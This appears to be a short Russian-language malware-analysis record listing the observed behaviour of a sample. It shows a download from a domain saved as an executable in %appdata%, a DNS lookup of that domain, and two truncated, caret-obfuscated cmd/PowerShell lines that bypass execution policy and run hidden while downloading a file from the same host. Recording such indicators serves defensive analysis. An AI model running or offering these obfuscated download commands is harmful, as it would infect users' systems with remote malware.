Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^ow^E^r^Shell.eXe ^-e^xe^c^u^TI^O^npo^L^Ic^Y bYPAsS -NOPrOFil^E -^W^iNDo^w^St^yLe H^IDDEN (^n^eW-Ob^jEc^t ^s^y^STe^M.N^e^t^.^we^bC^l^i^EnT).d^ownLOAd^fIl^e^('http://lolotocopo...
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /C "P^ow^E^r^Shell.eXe ^-e^xe^c^u^TI^O^npo^L^Ic^Y bYPAsS -NOPrOFil^E -^W^iNDo^w^St^yLe H^IDDEN (^n^eW-Ob^jEc^t ^s^y^STe^M.N^e^t^.^we^bC^l^i^EnT).d^ownLOAd^fIl^e^('http://lolotocopo...' (со скрытым окном)